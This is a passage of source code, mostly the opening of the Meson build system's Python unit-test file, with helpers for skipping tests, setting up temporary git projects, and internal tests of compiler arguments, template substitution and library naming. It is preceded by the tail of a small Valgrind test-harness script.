print "a) The log file will be produced in the directory containing the tests."
print "b) Valgrind typically takes O(100) times as long. I hope your test is short."
print "-" * 80
testharness.run()
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
self.assertEqual([1], listify(holder1, unholder=True))
self.assertEqual([1], listify([holder1], unholder=True))
self.assertEqual([1, 2], listify([holder1, 2], unholder=True))
self.assertEqual([1, 2, 3], listify([holder1, 2, [holder3]], unholder=True))
# Unholding doesn't work recursively when not flattening
self.assertEqual([1, [2], [holder3]], listify([holder1, [2], [holder3]], unholder=True, flatten=False))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True))
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', unholder=True, pop=True))
self.assertEqual(kwargs, {})
# Test listification
kwargs = {'sources': [1, 2, 3], 'pch_sources': [4, 5, 6]}
self.assertEqual([[1, 2, 3], [4, 5, 6]], extract(kwargs, 'sources', 'pch_sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
